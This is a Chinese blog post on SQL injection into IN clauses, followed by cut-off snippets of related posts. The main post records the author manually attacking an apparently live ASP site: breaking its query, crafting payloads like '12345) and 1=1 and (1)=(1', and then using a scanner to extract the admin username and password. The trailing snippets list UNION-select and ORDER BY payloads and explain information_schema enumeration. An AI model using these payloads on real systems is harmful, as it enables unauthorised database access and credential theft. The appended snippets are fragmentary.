IN語句的注入技巧

2022-09-23 17:18:10 字數 691 閱讀 3462

注入漏洞攻擊已經被哪些大牛們發掘的很深了,常見的注入攻擊語句也已被攻擊者熟知,比如經典的1=1之類的,小竹把這些注入攻擊歸類為三大類,一種是數字型的注入,一種是字元型的注入,還有一種是搜尋型的注入,其實這些攻擊手法已經借助於掃瞄工具來實現, 但是要是程式裡面的select語句是這樣寫的話,掃瞄軟體一般都掃不出漏洞了。

下面是我手動注入的一次記錄,在嘗試了n次手動檢測後,終於找到乙個頁面有漏洞,引數後加一』使之暴錯,出現以下的提示資訊:

以下是引用片段:

database engine 錯誤 '80040e14'

字串的語法錯誤 在查詢表示式 'articleid in (1234, 5678, 12345') order by articleid desc' 中。

/check.asp,行 56

顯示,這種語句是in語句的,我們構造如下的url進行攻擊

以下是引用片段:

/?add=12345) and 1=1 and (1)=(1

頁面顯示訂購產品資訊

以下是引用片段:

/?add=12345) and 1=2 and (1)=(1

訂購資訊置空了,看來有得玩。

然後拿出掃瞄工具,寫上掃瞄注入位址 /?add=12345 點選掃瞄,p都沒有掃出來,不要緊,在url中加上乙個右括號, /?add=12345) 接著掃瞄,ok,檢測到漏洞,成功猜解出後台使用者名稱密碼

SQL注入語句

對於sql語句注入來說 最重要的是利用其系統已存在的乙個information.schema 其中schemata是用來查詢庫名稱 tables用來查詢表名稱 columns用來查詢列名稱 order by語句用來判斷當前庫的列數 select用來查詢庫中的資訊 關於sql注入的相關流程 1.首先判...

常見注入語句

常規注入 20 23 and 1 1 and 1 2 and 1 2 union select from admin and 1 2 union select from user and 1 2 union select from users 爆字段長度 order by 1 order by 2 ...

MYSQL注入語句

union select 1,1,1,1,1 order by 13 union select 1,2,3,4,11,12,13 from admin union select 1,version 3,13 from admin union select 1,username,3,13 from a...